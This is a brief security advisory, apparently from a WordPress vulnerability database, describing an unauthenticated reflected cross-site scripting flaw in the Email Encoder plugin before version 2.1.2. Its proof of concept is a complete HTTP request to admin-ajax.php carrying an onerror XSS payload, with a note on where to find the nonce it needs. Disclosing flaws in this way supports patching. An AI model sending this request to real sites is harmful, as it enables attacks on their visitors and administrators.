Email Encoder < 2.1.2 - Reflected Cross Site Scripting

The plugin has an endpoint that requires no authentication and will render a user supplied value in the HTML response without escaping or sanitizing the data.

PoC

The vulnerable function is nonce protected, the nonce can be found in the site’s HTML source by searching for the javascript variable “eeb_ef” POST /wp-admin/admin-ajax.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 129 Origin: http://127.0.0.1:8080 DNT: 1 Connection: keep-alive Referer: http://127.0.0.1:8080/ Cookie: wordpress_test_cookie=WP%20Cookie%20check Upgrade-Insecure-Requests: 1 action=eeb_get_email_form_output&eebsec;=&eebMethod;=escape&eebDisplay;=<img src=1 onerror=alert(1)>